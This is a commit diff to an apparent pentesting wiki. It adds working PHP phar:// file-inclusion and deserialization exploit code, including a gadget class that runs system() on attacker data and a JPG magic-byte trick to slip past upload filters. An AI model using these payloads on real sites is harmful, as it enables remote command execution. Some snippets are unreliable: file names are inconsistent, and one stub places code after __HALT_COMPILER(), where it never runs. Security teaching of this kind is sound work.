GitBook: [master] 3 pages modified

SUMMARY.md

@@ -330,6 +330,7 @@
 * [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
 * [Email Header Injection](pentesting-web/email-header-injection.md)
 * [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md)
+  * [phar:// deserialization](pentesting-web/file-inclusion/phar-deserialization.md)
   * [LFI - Linux List](pentesting-web/file-inclusion/lfi-linux-list.md)
 * [File Upload](pentesting-web/file-upload/README.md)
   * [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)

pentesting-web/file-inclusion/README.md

@@ -235,7 +235,27 @@ POST DATA: <?php system('id'); ?>
 
 ### Wrapper phar://
 
-Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
+A `.phar` file can be also used to execute PHP code if the web is using some function like `include` to load the file.
+
+{% code title="create\_phar.php" %}
+```python
+<?php
+$phar = new Phar('test.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'text');
+$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
+
+$phar->stopBuffering();
+```
+{% endcode %}
+
+And you can compile the `phar` executing the following line:
+
+```bash
+php --define phar.readonly=0 create_path.php
+```
+
+ A file called `test.phar` will be generated that you can use to abuse the LFI.
 
 ## LFI2RCE
 

pentesting-web/file-inclusion/phar-deserialization.md

@@ -0,0 +1,73 @@
+# phar:// deserialization
+
+**Phar** files \(PHP Archive\) files **contain meta data in serialized format**, so, when parsed, this **metadata** is **deserialized** and you can try to abuse a **deserialization** vulnerability inside the **PHP** code.
+
+The best thing about this characteristic is that this deserialization will occur even using PHP functions that do not eval PHP code like **file\_get\_contents\(\), fopen\(\), file\(\) or file\_exists\(\), md5\_file\(\), filemtime\(\) or filesize\(\)**.
+
+So, imagine a situation where you can make a PHP web get the size of an arbitrary file an arbitrary file using the **`phar://`** protocol, and inside the code you find a **class** similar to the following one:
+
+{% code title="vunl.php" %}
+```php
+<?php
+class AnyClass {
+	public $data = null;
+	public function __construct($data) {
+		$this->data = $data;
+	}
+	
+	function __destruct() {
+		system($this->data);
+	}
+}
+
+filesize("phar://test.phar"); #The attacker can control this path
+```
+{% endcode %}
+
+You can create a **phar** file that when loaded will **abuse this class to execute arbitrary command**s with something like:
+
+{% code title="create\_phar.php" %}
+```php
+<?php
+
+class AnyClass {
+	public $data = null;
+	public function __construct($data) {
+		$this->data = $data;
+	}
+	
+	function __destruct() {
+		system($this->data);
+	}
+}
+
+// create new Phar
+$phar = new Phar('test.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'text');
+$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
+
+// add object of any class as meta data
+$object = new AnyClass('whoami');
+$phar->setMetadata($object);
+$phar->stopBuffering();
+```
+{% endcode %}
+
+Note how the **magic bytes of JPG** \(`\xff\xd8\xff`\) are added at the beginning of the phar file to **bypass** **possible** file **uploads** **restrictions**.  
+**Compile** the `test.phar` file with:
+
+```bash
+php --define phar.readonly=0 create_phar.php
+```
+
+And execute the `whoami` command abusing the vulnerable code with:
+
+```bash
+php vuln.php
+```
+
+### References
+
+[https://blog.ripstech.com/2018/new-php-exploitation-technique/](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
+